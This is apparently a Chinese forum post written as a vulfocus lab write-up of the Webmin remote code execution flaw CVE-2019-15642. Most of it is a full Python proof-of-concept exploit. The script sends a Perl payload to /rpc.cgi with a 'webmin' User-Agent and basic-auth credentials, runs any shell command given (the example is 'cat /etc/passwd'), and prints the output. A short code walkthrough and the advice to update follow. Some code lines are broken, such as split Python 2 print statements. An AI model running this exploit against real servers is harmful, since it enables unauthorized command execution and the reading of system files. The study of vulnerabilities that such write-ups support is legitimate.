|
webmin 远程代码执行 (CVE-2019-15642) 描述: vulfocus/webmin-cve_2019_15642 影响版本: [Webmin <= 1.920] 漏洞原理: 在rawarg函数下存在反序列化漏洞
为了触发我们需要两个先决条件的漏洞: 用户代理设置为“webmin”(Webmin将其解释为使用基本auth而不是会话cookie的日志); 有效基本权益对于Webmin的用户(例如,使用新创建的具有默认权限的用户“toto”)。 漏洞利用: 这里找到poc 代码如下: import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import sys
import base64
import re
banner = '''
_______ ________ ___ ___ __ ___ __ _____ __ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ | ____| / /| || |__ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | |__ / /_| || |_ ) |
| | \ \/ / | __|______/ /| | | || |\__, |______| |___ \| '_ \__ _/ /
| |____ \ / | |____ / /_| |_| || | / / | |___) | (_) | | |/ /_
\_____| \/ |______| |____|\___/ |_| /_/ |_|____/ \___/ |_|____|
python by jas502n
Webmin RCE (Need Authorization)
usage: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd"
'''
def CVE_2019_15642(url, auth_base64, cmd):
vuln_url = url + '/rpc.cgi'
headers = {
"User-Agent": "webmin",
"Connection": "close",
"Content-Type": "application/x-www-form-urlencoded",
"Authorization": "Basic %s" % auth_base64,
"Content-Length": "70"
}
proxies = {
'http': 'socks5h://127.0.0.1:1080',
'https': "socks5h://127.0.0.1:1080"
}
payload = r'OBJECT CGI;print "Content-Type: Test\n\n";' + '$cmd=`%s`;print "$cmd";' % cmd
print
"payload= %s" % payload
r = requests.post(url=vuln_url, data=payload, headers=headers, verify=False)
if r.status_code == 200 and 'Content-type' in r.text:
print
"\nVuln_Url= %s\n" % vuln_url
m = re.findall(r"(.+?)\nContent-type: text/plain", r.text, re.S)
print
">>>Execute Response: \n%s" % m[0]
else:
print
"No Vuln Exit!"
if __name__ == '__main__':
print
banner
username = input("Please Input Webmin Username: ")
password = input("Please Input Webmin Password: ")
auth = username + ':' + password
auth_base64 = base64.b64encode(auth)
print
'\n>>>Authorization: Basic %s\n' % auth_base64
url = sys.argv[1]
cmd = sys.argv[2]
CVE_2019_15642(url, auth_base64, cmd) 使用指令如下: 手工如下:需要修改user-Agent和使用root-root账号
分析一下poc代码 CVE_2019_15642(url, auth_base64, cmd):
vuln_url = url + '/rpc.cgi'
headers = {
"User-Agent": "webmin",
"Connection": "close",
"Content-Type": "application/x-www-form-urlencoded",
"Authorization": "Basic %s" % auth_base64,
"Content-Length": "70"
} 文件头指定"User-Agent": "webmin", payload = r'OBJECT CGI;print "Content-Type: Test\n\n";' + '$cmd=`%s`;print "$cmd";' % cmd payload r = requests.post(url=vuln_url, data=payload, headers=headers, verify=False)
if r.status_code == 200 and 'Content-type' in r.text:
print
"\nVuln_Url= %s\n" % vuln_url
m = re.findall(r"(.+?)\nContent-type: text/plain", r.text, re.S)
print
">>>Execute Response: \n%s" % m[0]
else:
print
"No Vuln Exit!" 爬虫回显 username = input("Please Input Webmin Username: ")
password = input("Please Input Webmin Password: ")
auth = username + ':' + password
auth_base64 = base64.b64encode(auth)
print
'\n>>>Authorization: Basic %s\n' % auth_base64
url = sys.argv[1]
cmd = sys.argv[2]
CVE_2019_15642(url, auth_base64, cmd) 遵循登录需要的编码协议 漏洞修复: 更新版本
| 
发表于 2021-10-24 21:05:15
楼主